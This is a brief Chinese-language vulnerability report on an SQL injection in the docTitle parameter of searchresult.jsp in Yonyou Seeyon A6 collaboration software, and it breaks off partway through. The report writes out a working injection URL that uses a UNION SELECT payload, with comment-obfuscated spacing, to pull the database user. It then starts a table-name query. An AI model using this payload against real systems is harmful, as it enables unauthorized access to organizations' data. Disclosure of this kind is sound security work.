用友致远A6协同管理SQL注射漏洞

简要描述： 用友致远A6协同管理SQL注射漏洞，需登录账户。 详细说明： 注入发生在searchresult.jsp文件中的docTitle参数 http://xxxxxx.com/yyoa/oaSearch/searchresult.jsp?docType=协同信息&docTitle=1'and//1=2// union//all//select//user,2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc 查询表名： http:// xxxxxx.com...